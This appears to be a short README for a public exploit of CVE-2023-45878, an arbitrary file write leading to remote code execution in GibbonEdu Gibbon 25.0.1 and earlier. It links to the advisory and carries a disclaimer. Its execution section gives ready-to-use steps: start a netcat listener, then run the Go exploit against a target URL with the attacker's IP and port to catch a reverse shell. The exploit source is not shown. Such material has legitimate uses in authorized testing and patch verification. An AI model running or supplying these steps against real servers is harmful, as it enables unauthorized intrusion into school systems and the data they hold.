## https://sploitus.com/exploit?id=CBE481B4-9107-5811-9E8D-653EEFDBCA0F
## CVE-2023-45878 GibbonEdu Gibbon Exploit version 25.0.1
## GibbonEdu Gibbon version 25.0.1 and before
GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write
## Read More
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
## Disclaimer
This exploit is provided for educational and research purposes only. Unauthorized use of this code against systems without explicit permission is illegal and may violate cybercrime laws in various jurisdictions. I assume no responsibility for any misuse or damage caused by this exploit.
It is the user’s responsibility to ensure compliance with all applicable laws and ethical guidelines before executing this code. Do not use this exploit for malicious activities.
## Info
This exploit works exclusively on `Windows Server`. If the vulnerable version of Gibbon runs on a `Linux` server, you will need to modify the exploit accordingly.
## Execute
1. Run netcat: `nc -lnvp <PORT>`
2. Execute the exploit: `go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>` or `./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>`